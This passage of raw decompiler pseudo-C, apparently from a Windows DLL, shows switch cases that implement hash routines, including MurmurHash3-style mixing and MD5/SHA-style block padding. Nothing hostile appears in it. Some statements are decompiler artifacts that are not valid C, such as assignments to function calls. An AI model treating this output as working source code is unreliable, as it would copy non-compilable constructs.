                                                      									L330:
                                                      									__eax =  *(__eax + __edx) & 0x000000ff;
                                                      									 *(__ecx + __edx) = __al;
                                                      									__esp =  &(__esp[5]);
                                                      									_pop(__ebx);
                                                      									_pop(__esi);
                                                      									_pop(__edi);
                                                      									_pop(__ebp);
                                                      									return __eax;
                                                      								} else {
                                                      									L329:
                                                      									__esp =  &(__esp[5]);
                                                      									_pop(__ebx);
                                                      									_pop(__esi);
                                                      									_pop(__edi);
                                                      									_pop(__ebp);
                                                      									return __eax;
                                                      								}
                                                      							}
                                                      							goto L440;
                                                      						case 0x14:
                                                      							__esp[3] = __ecx;
                                                      							__esp[2] = __edx;
                                                      							__eax =  *(__ebx + 0xc);
                                                      							__esp[1] =  *(__ebx + 0xc);
                                                      							__eax =  *(8 + __ebx);
                                                      							 *__esp =  *(8 + __ebx);
                                                      							__eax = E100101D0();
                                                      							 *(__ebx + 0xc) = __eax;
                                                      							__ebx = __esp[6];
                                                      							__esp =  &(__esp[7]);
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 0x15:
                                                      							__esp[2] = __ecx;
                                                      							__esp[1] = __edx;
                                                      							__eax =  *(__ebx + 0xc);
                                                      							 *__esp =  *(__ebx + 0xc);
                                                      							__eax = E10001410();
                                                      							 *(__ebx + 0xc) = __eax;
                                                      							__ebx = __esp[6];
                                                      							__esp =  &(__esp[7]);
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 0x16:
                                                      							__esp[2] = __ecx;
                                                      							__esp[1] = __eax;
                                                      							_push(__ebp);
                                                      							_push(__edi);
                                                      							__edi = 0x100b3b44;
                                                      							_push(__esi);
                                                      							__esi = 1;
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x2c;
                                                      							__ebx = __esp[0x10];
                                                      							__eax =  *__ebx;
                                                      							__edx =  *(__ebx + 4);
                                                      							__esp[2] = 1;
                                                      							__esp[1] = 0x100b3b44;
                                                      							 *__esp = __ebx;
                                                      							__edx = ( *(__ebx + 4) << 0x00000020 | __eax) << 3;
                                                      							__esp[9] = ( *(__ebx + 4) << 0x00000020 | __eax) << 3;
                                                      							__esp[8] = __eax;
                                                      							L81();
                                                      							__esi =  *__ebx;
                                                      							__edi =  *(__ebx + 4);
                                                      							__esi = __esi & 0x0000003f;
                                                      							if((__esi & 0x0000003f ^ 0x00000038) != 0) {
                                                      								__ebp = __ebx + 0x48;
                                                      								__esp[5] = __ebx + 0x48;
                                                      								__ecx = 8 + __ebx;
                                                      								__ebp = 8 + __ebx;
                                                      								while(1) {
                                                      									L117:
                                                      									__eax = __esi;
                                                      									__eax = __esi & 0x0000003f;
                                                      									__esi = __esi + 1;
                                                      									 *__ebx = __esi;
                                                      									asm("adc edi, 0x0");
                                                      									 *(__ebx + 4) = __edi;
                                                      									if(__eax != 0) {
                                                      										break;
                                                      									}
                                                      									__eax = __esp[5];
                                                      									__ecx = 0;
                                                      									__edx = 0x100b3b46;
                                                      									E10025550(__esp[5], 0, 0x100b3b46) = __esi;
                                                      									 *(8 + __ebx) = 0;
                                                      									__esi & 0x0000003f = __esi & 0x0000003f ^ 0x00000038;
                                                      									__eax = __esi & 0x0000003f ^ 0x00000038;
                                                      									if((__esi & 0x0000003f ^ 0x00000038) != 0) {
                                                      										continue;
                                                      									}
                                                      									goto L121;
                                                      								}
                                                      								 *(__eax + __ebp) = 0;
                                                      								if(__eax == 0x3f) {
                                                      									__edi = __esp[5];
                                                      									__ecx = 1;
                                                      									__edx = __ebp;
                                                      									__edi = E10025550(__edi, 1, __ebp);
                                                      									__ecx = 0;
                                                      									__edx = 0x100b3b47;
                                                      									__edi = E10025550(__edi, 0, 0x100b3b47);
                                                      								}
                                                      								__esi =  *__ebx;
                                                      								__edi =  *(__ebx + 4);
                                                      								__esi = __esi & 0x0000003f;
                                                      								if((__esi & 0x0000003f ^ 0x00000038) != 0) {
                                                      									goto L117;
                                                      								}
                                                      							}
                                                      							L121:
                                                      							 *__esp = __ebx;
                                                      							__eax = 8;
                                                      							__esp[2] = 8;
                                                      							__eax =  &(__esp[8]);
                                                      							__esp[1] =  &(__esp[8]);
                                                      							L81();
                                                      							__eax =  *(__ebx + 0x54);
                                                      							__edi = __esp[0x11];
                                                      							 *__edi =  *(__ebx + 0x54);
                                                      							__eax =  *(__ebx + 0x50);
                                                      							 *(__edi + 4) =  *(__ebx + 0x50);
                                                      							__eax =  *(__ebx + 0x4c);
                                                      							 *(__edi + 8) =  *(__ebx + 0x4c);
                                                      							__eax =  *(__ebx + 0x48);
                                                      							 *(__edi + 0xc) = __eax;
                                                      							__esp =  &(__esp[0xb]);
                                                      							_pop(__ebx);
                                                      							_pop(__esi);
                                                      							_pop(__edi);
                                                      							_pop(__ebp);
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 0x17:
                                                      							__esp[2] = __ecx;
                                                      							__esp[1] = __eax;
                                                      							_push(__ebp);
                                                      							_push(__edi);
                                                      							_push(__esi);
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x1c;
                                                      							__eax = __esp[0xc];
                                                      							__edi = __esp[0xc];
                                                      							__edx =  *(__eax + 4);
                                                      							__eax =  *__eax;
                                                      							__esp[3] = __edx;
                                                      							__esp[2] = __eax;
                                                      							__eax = __esp[0xc];
                                                      							__edx =  *(__eax + 0xc);
                                                      							__eax =  *(__eax + 8);
                                                      							__esp[5] = __edx;
                                                      							__edx = 0x10;
                                                      							__esp[4] = __eax;
                                                      							__eax = __esp[0xc];
                                                      							__eax =  *(__esp[0xc] + 0x20);
                                                      							__edi = __esp[0xc] + __eax + 0x10;
                                                      							__edx = 0x10 - __eax;
                                                      							if(0x10 >= 8) {
                                                      								if((__edi & 0x00000001) != 0) {
                                                      									 *__edi = 0;
                                                      									__edx = __edx - 1;
                                                      									__edi = __edi + 1;
                                                      								}
                                                      								if((__edi & 0x00000002) != 0) {
                                                      									 *__edi = 0;
                                                      									__edx = __edx - 2;
                                                      									__edi = __edi + 2;
                                                      								}
                                                      								if((__edi & 0x00000004) != 0) {
                                                      									 *__edi = 0;
                                                      									__edx = __edx - 4;
                                                      									__edi = __edi + 4;
                                                      								}
                                                      								__ecx = __edx;
                                                      								__eax = 0;
                                                      								__ecx = __edx >> 2;
                                                      								__edx = __edx & 0x00000003;
                                                      								__eax = memset(__edi, 0, __ecx << 2);
                                                      								__edi = __edi + __ecx;
                                                      								__ecx = 0;
                                                      							}
                                                      							if((__dl & 0x00000004) != 0) {
                                                      								 *__edi = 0;
                                                      								__edi = __edi + 4;
                                                      							}
                                                      							if((__dl & 0x00000002) != 0) {
                                                      								 *__edi = 0;
                                                      								__edi = __edi + 2;
                                                      							}
                                                      							if((__dl & 0x00000001) != 0) {
                                                      								 *__edi = 0;
                                                      							}
                                                      							__eax = __esp[0xc];
                                                      							__ebx = __esp[0xc];
                                                      							__edi = __esp[3];
                                                      							__eax =  *(0x10 + __esp[0xc]);
                                                      							__ecx =  *(__esp[0xc] + 0x14) * 0x114253d5;
                                                      							__ebx = 0x114253d5;
                                                      							__edx = __eax * 0x87c37b91;
                                                      							__ecx =  *(__esp[0xc] + 0x14) * 0x114253d5 + __eax * 0x87c37b91;
                                                      							__edx = __eax * 0x114253d5 >> 0x20;
                                                      							__eax = __eax * 0x114253d5;
                                                      							__edx = __edx + __ecx;
                                                      							__ecx = __eax;
                                                      							__eax = (__eax << 0x00000020 | __edx) << 0x1f;
                                                      							__edx = (__edx << 0x00000020 | __ecx) << 0x1f;
                                                      							__ebx = __eax;
                                                      							__eax = __esp[0xc];
                                                      							__esi = __edx;
                                                      							__ecx = __esp[2];
                                                      							__edx =  *(__eax + 0x2c);
                                                      							__eax =  *(__eax + 0x28);
                                                      							__esp[1] = __edx;
                                                      							__edx = __edx ^ __esp[3];
                                                      							 *__esp = __eax;
                                                      							__ebp = __edx;
                                                      							__eax = __eax ^ __esp[2];
                                                      							__edx = __ebx * 0x4cf5ad43;
                                                      							__edi = __eax;
                                                      							__ecx = __esi * 0x2745937f;
                                                      							__esi = 0x114253d5;
                                                      							__eax = __ecx + __ebx * 0x4cf5ad43;
                                                      							__ecx = 0x2745937f;
                                                      							__esp[2] = __eax;
                                                      							__eax = __ebx;
                                                      							__edx = __eax * 0x2745937f >> 0x20;
                                                      							__eax = __eax * 0x2745937f;
                                                      							__ebx = __esp[2];
                                                      							__eax = __eax ^ __edi;
                                                      							__edx = __esp[2] + __edx;
                                                      							__ebx = __esp[0xc];
                                                      							__esp[2] = __eax;
                                                      							__eax = __esp[0xc];
                                                      							__esp[3] = __edx;
                                                      							__edi =  *__esp;
                                                      							__ebp = __esp[1];
                                                      							__ecx =  *(__esp[0xc] + 0x1c) * 0x2745937f;
                                                      							__eax =  *(__esp[0xc] + 0x18);
                                                      							__ebx = __esp[5];
                                                      							__edx = __eax * 0x4cf5ad43;
                                                      							__ebp = __esp[1] ^ __esp[5];
                                                      							__ecx =  *(__esp[0xc] + 0x1c) * 0x2745937f + __eax * 0x4cf5ad43;
                                                      							__edx = 0x2745937f;
                                                      							__edx = __eax * 0x2745937f >> 0x20;
                                                      							__eax = __eax * 0x2745937f;
                                                      							__edx = __edx + __ecx;
                                                      							__ecx = __eax;
                                                      							 *__esp = __eax;
                                                      							__edx = (__ecx << 0x00000020 | __edx) >> 0x1f;
                                                      							__ecx = __esp[4];
                                                      							__eax =  *__esp;
                                                      							__edi =  *__esp ^ __esp[4];
                                                      							__ecx =  *__esp ^ __esp[4];
                                                      							__edi = __edx * 0x114253d5;
                                                      							__edx =  *__esp * 0x87c37b91;
                                                      							__edi = __edi +  *__esp * 0x87c37b91;
                                                      							__edx = __eax * 0x114253d5 >> 0x20;
                                                      							__eax = __eax * 0x114253d5;
                                                      							__esi = __esp[2];
                                                      							__edx = __edi + __edx;
                                                      							__edi = __esp[3];
                                                      							__eax = __eax ^  *__esp ^ __esp[4];
                                                      							__edx = __edx ^ __esp[1] ^ __esp[5];
                                                      							__esi = __esp[2] + __eax;
                                                      							__ebp = 0x1a85ec53;
                                                      							asm("adc edi, edx");
                                                      							__eax = __eax + __esi;
                                                      							asm("adc edx, edi");
                                                      							__ecx = __eax;
                                                      							__eax = __edi;
                                                      							__ebx = __edx;
                                                      							__eax = __edi >> 1;
                                                      							__edx = 0;
                                                      							__eax = __edi >> 0x00000001 ^ __esi;
                                                      							__edx = 0 ^ __edi;
                                                      							__esi = (0 ^ __edi) * 0xed558ccd;
                                                      							__edi = __eax;
                                                      							__edx = __eax * 0xff51afd7;
                                                      							__eax = 0xed558ccd;
                                                      							__esi = __esi + __edx;
                                                      							__edx = 0xed558ccd * __edi >> 0x20;
                                                      							__eax = 0xed558ccd * __edi;
                                                      							__edi = 0;
                                                      							__edx = __esi + __edx;
                                                      							__esi = __edx;
                                                      							__edx = __edx ^ 0;
                                                      							 *__esp = __eax;
                                                      							__esi = __edx * 0x1a85ec53;
                                                      							__eax =  *__esp;
                                                      							__edx =  *__esp * 0xc4ceb9fe;
                                                      							__edi = __esi + __edx;
                                                      							__esp[2] = __esi + __edx;
                                                      							__edx = __eax * 0x1a85ec53 >> 0x20;
                                                      							__eax = __eax * 0x1a85ec53;
                                                      							__edi = __edx;
                                                      							__edx = __esp[2];
                                                      							__esi = __eax;
                                                      							__edi = __edi + __esp[2];
                                                      							__edx = __edi;
                                                      							__eax = __edi;
                                                      							__edx = 0;
                                                      							__esp[3] = 0;
                                                      							__eax = __edi >> 1;
                                                      							__edx = __ebx;
                                                      							__esp[2] = __edi >> 1;
                                                      							__eax = __ebx;
                                                      							__edx = 0;
                                                      							__eax = __ebx >> 1;
                                                      							__edx = 0 ^ __ebx;
                                                      							__ebx = (0 ^ __ebx) * 0xed558ccd;
                                                      							 *__esp = __eax;
                                                      							__ecx = 0xed558ccd;
                                                      							__edx =  *__esp * 0xff51afd7;
                                                      							__eax =  *__esp;
                                                      							__ebx = __ebx +  *__esp * 0xff51afd7;
                                                      							__edx = __eax * 0xed558ccd >> 0x20;
                                                      							__eax = __eax * 0xed558ccd;
                                                      							__edx = __edx + __ebx;
                                                      							__ebx = __edx;
                                                      							__ecx = __edx;
                                                      							__ebx = 0;
                                                      							__edx >> 1 = __edx >> 0x00000001 ^ __eax;
                                                      							__ebx = 0 ^ __edx;
                                                      							 *__esp = __edx >> 0x00000001 ^ __eax;
                                                      							__edx = __ebx;
                                                      							__eax =  *__esp * 0xc4ceb9fe;
                                                      							__esp[1] = __ebx;
                                                      							__ebx = __ebx * 0x1a85ec53;
                                                      							__ebx = __ebx +  *__esp * 0xc4ceb9fe;
                                                      							__eax =  *__esp;
                                                      							__edx = __eax * 0x1a85ec53 >> 0x20;
                                                      							__eax = __eax * 0x1a85ec53;
                                                      							__edx = __edx + __ebx;
                                                      							__ebx = 0;
                                                      							__ecx = __edx;
                                                      							__edx = __edx ^ 0;
                                                      							__ebx = __esp[3];
                                                      							__eax = __eax ^ __ecx;
                                                      							__ecx = __esp[2];
                                                      							__ebx = __edi;
                                                      							__edi = __esp[0xd];
                                                      							__esi = __esi ^ __esp[2];
                                                      							__ecx = __esi;
                                                      							__ecx = __esi + __eax;
                                                      							 *__edi = __ecx;
                                                      							asm("adc ebx, edx");
                                                      							__ecx = __eax + __ecx;
                                                      							 *(__edi + 4) = __ebx;
                                                      							asm("adc ebx, edx");
                                                      							 *(__edi + 8) = __ecx;
                                                      							 *(__edi + 0xc) = __ebx;
                                                      							__esp =  &(__esp[7]);
                                                      							_pop(__ebx);
                                                      							_pop(__esi);
                                                      							_pop(__edi);
                                                      							_pop(__ebp);
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 0x18:
                                                      							__esp[2] = __ecx;
                                                      							__esp[1] = __eax;
                                                      							_push(__edi);
                                                      							__edi = 1;
                                                      							_push(__esi);
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x20;
                                                      							__esi = __esp[0xc];
                                                      							__ebx = __esp[0xd];
                                                      							__eax =  *(__esi + 8);
                                                      							__edx =  *(__esi + 0xc);
                                                      							__esp[2] = 1;
                                                      							__edi = __esi + 0x10;
                                                      							 *__esp = __esi;
                                                      							__edx = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
                                                      							__esp[7] = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
                                                      							__esp[6] = __eax;
                                                      							__eax = 0x100bc2e0;
                                                      							__esp[1] = 0x100bc2e0;
                                                      							L220();
                                                      							__eax =  *(__esi + 8);
                                                      							__edx =  *(__esi + 0xc);
                                                      							__eax = __eax & 0x0000003f;
                                                      							if((__eax & 0x0000003f ^ 0x00000038) != 0) {
                                                      								do {
                                                      									__ecx = __eax;
                                                      									__ecx = __eax & 0x0000003f;
                                                      									 *(__esi + 8) = __eax;
                                                      									asm("adc edx, 0x0");
                                                      									 *(__esi + 0xc) = __edx;
                                                      									if(__ecx != 0x3f) {
                                                      										 *((char*)(__esi + 0x10 + __ecx)) = 0;
                                                      									} else {
                                                      										 *((char*)(__esi + 0x4f)) = 0;
                                                      										__eax = __esi + 0x50;
                                                      										__esp[1] = __edi;
                                                      										 *__esp = __esi + 0x50;
                                                      										__eax =  *((intOrPtr*)(__esi + 0x78))();
                                                      									}
                                                      									__eax =  *(__esi + 8);
                                                      									__edx =  *(__esi + 0xc);
                                                      									__eax = __eax & 0x0000003f;
                                                      								} while ((__eax & 0x0000003f ^ 0x00000038) != 0);
                                                      							} else {
                                                      							}
                                                      							 *__esp = __esi;
                                                      							__eax = 8;
                                                      							__esp[2] = 8;
                                                      							__eax =  &(__esp[6]);
                                                      							__esp[1] = __eax;
                                                      							L220();
                                                      							if( *__esi != 0) {
                                                      								__eax =  *(__esi + 0x50);
                                                      								 *__ebx = __eax;
                                                      								if( *__esi > 1) {
                                                      									__eax =  *(__esi + 0x54);
                                                      									 *(__ebx + 4) = __eax;
                                                      									if( *__esi > 2) {
                                                      										__eax =  *(__esi + 0x58);
                                                      										 *(8 + __ebx) = __eax;
                                                      										if( *__esi > 3) {
                                                      											__eax =  *(__esi + 0x5c);
                                                      											 *(__ebx + 0xc) = __eax;
                                                      											if( *__esi > 4) {
                                                      												__eax =  *(__esi + 0x60);
                                                      												 *(0x10 + __ebx) = __eax;
                                                      												if( *__esi > 5) {
                                                      													__eax =  *(__esi + 0x64);
                                                      													 *(__ebx + 0x14) = __eax;
                                                      													if( *__esi > 6) {
                                                      														__eax =  *(__esi + 0x68);
                                                      														 *(__ebx + 0x18) = __eax;
                                                      														if( *__esi > 7) {
                                                      															__eax =  *(__esi + 0x6c);
                                                      															 *(__ebx + 0x1c) = __eax;
                                                      															if( *__esi > 8) {
                                                      																__eax =  *(__esi + 0x70);
                                                      																 *(__ebx + 0x20) = __eax;
                                                      																if( *__esi > 9) {
                                                      																	__eax =  *(__esi + 0x74);
                                                      																	 *(__ebx + 0x24) = __eax;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							__esp =  &(__esp[8]);
                                                      							_pop(__ebx);
                                                      							_pop(__esi);
                                                      							_pop(__edi);
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 0x19:
                                                      							__esp[2] = __ecx;
                                                      							__esp[1] = __eax;
                                                      							_push(__ebp);
                                                      							_push(__edi);
                                                      							__edi = 1;
                                                      							_push(__esi);
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x2c;
                                                      							__esi = __esp[0x10];
                                                      							__ebx = __esp[0x11];
                                                      							__eax =  *(__esi + 8);
                                                      							__edx =  *(__esi + 0xc);
                                                      							__esp[2] = 1;
                                                      							__edi = __esi + 0x10;
                                                      							 *__esp = __esi;
                                                      							__edx = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
                                                      							__eax = __eax << 3;
                                                      							__ebp = __edx;
                                                      							__edx = __eax;
                                                      							__eax = __ebp;
                                                      							__ebp = 0x100bc420;
                                                      							asm("bswap edx");
                                                      							asm("bswap eax");
                                                      							__esp[1] = 0x100bc420;
                                                      							__esp[6] = __eax;
                                                      							__esp[7] = __edx;
                                                      							L273();
                                                      							__eax =  *(__esi + 8);
                                                      							__edx =  *(__esi + 0xc);
                                                      							__eax = __eax & 0x0000003f;
                                                      							if((__eax & 0x0000003f ^ 0x00000038) != 0) {
                                                      								do {
                                                      									__ecx = __eax;
                                                      									__ecx = __eax & 0x0000003f;
                                                      									 *(__esi + 8) = __eax;
                                                      									asm("adc edx, 0x0");
                                                      									 *(__esi + 0xc) = __edx;
                                                      									if(__ecx != 0x3f) {
                                                      										 *((char*)(__esi + 0x10 + __ecx)) = 0;
                                                      									} else {
                                                      										 *((char*)(__esi + 0x4f)) = 0;
                                                      										__eax = __esi + 0x50;
                                                      										__esp[1] = __edi;
                                                      										 *__esp = __esi + 0x50;
                                                      										__eax =  *(__esi + 0x70)();
                                                      									}
                                                      									__eax =  *(__esi + 8);
                                                      									__edx =  *(__esi + 0xc);
                                                      									__eax = __eax & 0x0000003f;
                                                      								} while ((__eax & 0x0000003f ^ 0x00000038) != 0);
                                                      							} else {
                                                      							}
                                                      							 *__esp = __esi;
                                                      							__eax = 8;
                                                      							__esp[2] = 8;
                                                      							__eax =  &(__esp[6]);
                                                      							__esp[1] = __eax;
                                                      							L273();
                                                      							if( *__esi != 0) {
                                                      								__eax =  *(__esi + 0x50);
                                                      								asm("bswap eax");
                                                      								 *__ebx = __eax;
                                                      								if( *__esi > 1) {
                                                      									__eax =  *(__esi + 0x54);
                                                      									asm("bswap eax");
                                                      									 *(__ebx + 4) = __eax;
                                                      									if( *__esi > 2) {
                                                      										__eax =  *(__esi + 0x58);
                                                      										asm("bswap eax");
                                                      										 *(8 + __ebx) = __eax;
                                                      										if( *__esi > 3) {
                                                      											__eax =  *(__esi + 0x5c);
                                                      											asm("bswap eax");
                                                      											 *(__ebx + 0xc) = __eax;
                                                      											if( *__esi > 4) {
                                                      												__eax =  *(__esi + 0x60);
                                                      												asm("bswap eax");
                                                      												 *(0x10 + __ebx) = __eax;
                                                      												if( *__esi > 5) {
                                                      													__eax =  *(__esi + 0x64);
                                                      													asm("bswap eax");
                                                      													 *(__ebx + 0x14) = __eax;
                                                      													if( *__esi > 6) {
                                                      														__eax =  *(__esi + 0x68);
                                                      														asm("bswap eax");
                                                      														 *(__ebx + 0x18) = __eax;
                                                      														if( *__esi > 7) {
                                                      															__eax =  *(__esi + 0x6c);
                                                      															asm("bswap eax");
                                                      															 *(__ebx + 0x1c) = __eax;
                                                      															if( *__esi > 8) {
                                                      																__eax =  *(__esi + 0x70);
                                                      																asm("bswap eax");
                                                      																 *(__ebx + 0x20) = __eax;
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							__esp =  &(__esp[0xb]);
                                                      							_pop(__ebx);
                                                      							_pop(__esi);
                                                      							_pop(__edi);
                                                      							_pop(__ebp);
                                                      							return __eax;
                                                      							goto L440;
                                                      						case 0x1a:
                                                      							__esp[2] = __ecx;
                                                      							__esp[1] = __eax;
                                                      							_push(__ebp);
                                                      							__eax = 0;
                                                      							_push(__edi);
                                                      							__edx = 0;
                                                      							_push(__esi);
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x1c;
                                                      							__esp[2] = 0;
                                                      							__ebx = __esp[0xc];
                                                      							__esp[3] = 0;
                                                      							__eax =  *(8 + __ebx);
                                                      							__edx =  *(__ebx + 0xc);
                                                      							__eax = __eax << 3;
                                                      							__edi = __edx;
                                                      							__edi = (__edx << 0x00000020 | __eax) << 3;
                                                      							__ecx = __eax << 3;
                                                      							asm("bswap ecx");
                                                      							__esp[5] = __eax << 3;
                                                      							__ecx = __eax;
                                                      							__ecx = __eax & 0x0000007f;
                                                      							 *(8 + __ebx) = __eax;
                                                      							asm("adc edx, 0x0");
                                                      							__esi = __edi;
                                                      							asm("bswap esi");
                                                      							 *(__ebx + 0xc) = __edx;
                                                      							__esp[4] = __edi;
                                                      							if(__ecx == 0x7f) {
                                                      								 *((char*)(__ebx + 0x8f)) = 0x80;
                                                      								__edx = 0x10 + __ebx;
                                                      								__esi = 0x100bc429;
                                                      								__ebx + 0x90 = L1003EA30(__ebx + 0x90, 0x10 + __ebx);
                                                      								__edx = 0x10;
                                                      								__ecx = 0;
                                                      							} else {
                                                      								__edx = 0x10 + __ecx;
                                                      								__esi = 0x100bc428;
                                                      								__ecx = 1;
                                                      							}
                                                      							__edx = __edx + __ebx;
                                                      							if(__ecx != 0) {
                                                      								__eax = 0;
                                                      								__edi = __ebx;
                                                      								do {
                                                      									__ebx =  *(__esi + __eax) & 0x000000ff;
                                                      									 *(__eax + __edx) = __bl;
                                                      									__eax = __eax + 1;
                                                      								} while (__eax < __ecx);
                                                      								__ebx = __edi;
                                                      							}
                                                      							__esi =  *(8 + __ebx);
                                                      							__edi =  *(__ebx + 0xc);
                                                      							__esi = __esi & 0x0000007f;
                                                      							if((__esi & 0x0000007f ^ 0x00000070) != 0) {
                                                      								__ebp = 0x10 + __ebx;
                                                      								while(1) {
                                                      									L369:
                                                      									__eax = __esi;
                                                      									__eax = __esi & 0x0000007f;
                                                      									__esi = __esi + 1;
                                                      									 *(8 + __ebx) = __esi;
                                                      									asm("adc edi, 0x0");
                                                      									 *(__ebx + 0xc) = __edi;
                                                      									if(__eax == 0x7f) {
                                                      										break;
                                                      									}
                                                      									 *((char*)(__ebx + __eax + 0x10)) = 0;
                                                      									__esi =  *(8 + __ebx);
                                                      									__edi =  *(__ebx + 0xc);
                                                      									__esi = __esi & 0x0000007f;
                                                      									if((__esi & 0x0000007f ^ 0x00000070) != 0) {
                                                      										continue;
                                                      									}
                                                      									goto L371;
                                                      								}
                                                      								 *((char*)(__ebx + 0x8f)) = 0;
                                                      								__eax = __ebx + 0x90;
                                                      								__edx = __ebp;
                                                      								L1003EA30(__ebx + 0x90, __ebp) = __esi;
                                                      								__esi & 0x0000007f = __esi & 0x0000007f ^ 0x00000070;
                                                      								__eax = __esi & 0x0000007f ^ 0x00000070;
                                                      								if((__esi & 0x0000007f ^ 0x00000070) != 0) {
                                                      									goto L369;
                                                      								}
                                                      							}
                                                      							L371:
                                                      							__ebp = __esi;
                                                      							__ebp = __esi & 0x0000007f;
                                                      							 *(8 + __ebx) = __esi;
                                                      							__esi = 0x80;
                                                      							asm("adc edi, 0x0");
                                                      							 *(__ebx + 0xc) = __edi;
                                                      							__edx = 0x10 + __ebp;
                                                      							__esi = 0x80 - __ebp;
                                                      							if(0x80 <= 8) {
                                                      								__edx = __edx + __ebx;
                                                      								__ecx =  &(__esp[2]);
                                                      								__edi = 0x80;
                                                      								if(0x80 >= 4) {
                                                      									if((__dl & 0x00000001) != 0) {
                                                      										__eax = __esp[2] & 0x000000ff;
                                                      										__ecx =  &(__esp[2]);
                                                      										__edx = __edx + 1;
                                                      										__edi = 0x7f;
                                                      										 *(__edx - 1) = __al;
                                                      									}
                                                      									if((__dl & 0x00000002) != 0) {
                                                      										__eax =  *__ecx & 0x0000ffff;
                                                      										__edx = __edx + 2;
                                                      										__ecx = __ecx + 2;
                                                      										__edi = __edi - 2;
                                                      										 *(__edx - 2) = __ax;
                                                      									}
                                                      									if(__edi >= 4) {
                                                      										__esp[1] = __ebp;
                                                      										__eax = __edi;
                                                      										__esp[0xc] = __ebx;
                                                      										__eax = __edi & 0xfffffffc;
                                                      										 *__esp = __edi & 0xfffffffc;
                                                      										__eax = 0;
                                                      										__ebp =  *__esp;
                                                      										do {
                                                      											__ebx =  *(__eax + __ecx);
                                                      											 *(__eax + __edx) =  *(__eax + __ecx);
                                                      											__eax = __eax + 4;
                                                      										} while (__eax < __ebp);
                                                      										__ebp = __esp[1];
                                                      										__edx = __eax + __edx;
                                                      										__ecx = __eax + __ecx;
                                                      										__ebx = __esp[0xc];
                                                      									}
                                                      								}
                                                      								__eax = 0;
                                                      								if((__edi & 0x00000002) != 0) {
                                                      									__eax =  *__ecx & 0x0000ffff;
                                                      									__edi = __edi & 0x00000001;
                                                      									 *__edx = __ax;
                                                      									__eax = 2;
                                                      									if(__edi != 0) {
                                                      										goto L414;
                                                      									}
                                                      								} else {
                                                      									if(__edi != 0) {
                                                      										L414:
                                                      										__ecx =  *(__eax + __ecx) & 0x000000ff;
                                                      										 *(__eax + __edx) = __cl;
                                                      									}
                                                      								}
                                                      								__edx = 0x10 + __ebx;
                                                      								__ebp = __ebp - 0x78;
                                                      								__ebx + 0x90 = L1003EA30(__ebx + 0x90, 0x10 + __ebx);
                                                      								__eax = __esi + 8;
                                                      								__edx = 0x10;
                                                      								__eax = __esi + 8 + __esp;
                                                      							} else {
                                                      								__eax =  &(__esp[2]);
                                                      								__ebp = 8;
                                                      							}
                                                      							__ecx = __ebx + __edx;
                                                      							if(__ebp >= 4) {
                                                      								if((__cl & 0x00000001) != 0) {
                                                      									__edx =  *__eax & 0x000000ff;
                                                      									__ecx = __ecx + 1;
                                                      									__eax = __eax + 1;
                                                      									__ebp = __ebp - 1;
                                                      									 *(__ecx - 1) = __dl;
                                                      								}
                                                      								if((__cl & 0x00000002) != 0) {
                                                      									__edx =  *__eax & 0x0000ffff;
                                                      									__ecx = __ecx + 2;
                                                      									__eax = __eax + 2;
                                                      									__ebp = __ebp - 2;
                                                      									 *(__ecx - 2) = __dx;
                                                      								}
                                                      								if(__ebp >= 4) {
                                                      									__esi = __ebp;
                                                      									__edx = 0;
                                                      									__esi = __ebp & 0xfffffffc;
                                                      									do {
                                                      										__edi =  *(__eax + __edx);
                                                      										 *(__ecx + __edx) =  *(__eax + __edx);
                                                      										__edx = __edx + 4;
                                                      									} while (__edx < __esi);
                                                      									__ecx = __ecx + __edx;
                                                      									__eax = __eax + __edx;
                                                      								}
                                                      							}
                                                      							__edx = 0;
                                                      							if((__ebp & 0x00000002) != 0) {
                                                      								__edx =  *__eax & 0x0000ffff;
                                                      								__ebp = __ebp & 0x00000001;
                                                      								 *__ecx = __dx;
                                                      								__edx = 2;
                                                      								if(__ebp == 0) {
                                                      									goto L376;
                                                      								} else {
                                                      									goto L390;
                                                      								}
                                                      								L386:
                                                      								__esp =  &(__esp[7]);
                                                      								_pop(__ebx);
                                                      								_pop(__esi);
                                                      								_pop(__edi);
                                                      								_pop(__ebp);
                                                      								return __eax;
                                                      								goto L440;
                                                      							} else {
                                                      								if(__ebp != 0) {
                                                      									L390:
                                                      									__eax =  *(__eax + __edx) & 0x000000ff;
                                                      									 *(__ecx + __edx) = __al;
                                                      								}
                                                      							}
                                                      							L376:
                                                      							__eax =  *(8 + __ebx);
                                                      							__edi = 0x80;
                                                      							__edx =  *(__ebx + 0xc);
                                                      							__esi = __eax;
                                                      							__esi = __eax & 0x0000007f;
                                                      							 *(8 + __ebx) = __eax;
                                                      							asm("adc edx, 0x0");
                                                      							__edi = 0x80 - __esi;
                                                      							if(0x80 <= 8) {
                                                      								__ebp = 0x80;
                                                      								__edx = __esi + 0x10 + __ebx;
                                                      								__ecx =  &(__esp[4]);
                                                      								if(0x80 >= 4) {
                                                      									if((__dl & 0x00000001) != 0) {
                                                      										__eax = __esp[4] & 0x000000ff;
                                                      										__ecx =  &(__esp[4]);
                                                      										__edx = __edx + 1;
                                                      										__ebp = 0x7f;
                                                      										 *(__edx - 1) = __al;
                                                      									}
                                                      									if((__dl & 0x00000002) != 0) {
                                                      										__eax =  *__ecx & 0x0000ffff;
                                                      										__edx = __edx + 2;
                                                      										__ecx = __ecx + 2;
                                                      										__ebp = __ebp - 2;
                                                      										 *(__edx - 2) = __ax;
                                                      									}
                                                      									if(__ebp >= 4) {
                                                      										__esp[1] = __esi;
                                                      										__eax = __ebp;
                                                      										__esp[0xc] = __ebx;
                                                      										__eax = __ebp & 0xfffffffc;
                                                      										 *__esp = __ebp & 0xfffffffc;
